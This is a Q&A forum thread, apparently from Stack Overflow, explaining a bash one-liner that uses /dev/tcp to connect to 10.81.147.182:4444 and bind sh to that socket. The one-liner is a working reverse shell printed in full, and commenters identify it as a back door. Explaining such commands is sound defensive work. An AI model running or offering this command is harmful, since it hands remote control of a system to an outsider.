# Understanding "bash" snippets

Tags: bash, shell, sockets, tcp, code-snippets

Could someone explain the following command for me please?

```
0<&112-;exec 112<>/dev/tcp/10.81.147.182/4444;sh <&112 >&112 2>&112
```

Comment: I'm guessing that means to establish a ssh listener that receives input and outputs it directly to and from the tcp connection.

Comment: yes, thanks. do you know the exact meaning of 0<&112..

Comment: Don't miss the hyphen!  `0<&112-`, that closes the file descriptor.

Comment: I think the first part zeroes out all input so nothing will be piped into the shell to start.  Searching online, I saw that this command seems to be associated with a hack that allows someone to arbitrarily create files without access.

Comment: @Neil:  `man bash` gives: *`[n]<&digit-

 moves  the  file descriptor digit to file descriptor n, or the standard
       input (file descriptor 0) if n is not specified.  digit is closed after
       being duplicated to n.`*

Answer (score 1):

See [What are the uses of the exec command in shell scripts?](https://stackoverflow.com/questions/18351198/what-are-the-uses-of-the-exec-command-in-shell-scripts/18351547#18351547)

Abbreviations:

- fd - file descriptor, an I/O channel identified by an integer
- stdin - file descriptor zero, standard input, by default the terminal keyboard
- stdout - file descriptor 1, standard output, by default the buffered terminal screen
- stderr - file descriptor 2, standard error, by default the unbuffered terminal screen

Breaking this down:

```
# Move existing fd 122 to fd 0 (stdin), then close fd 112
0<&112-;      

# Open fd 112 for read/write on IP address and port
exec 112<>/dev/tcp/10.81.147.182/4444;  

# Run a POSIX shell (sh) taking stdin stdout and stderr to/from port 112
sh <&112 >&112 2>&112
```

Comment: So, in other words, run a back door so whoever is on 10.81.147.182 can use (or probably even control) your system.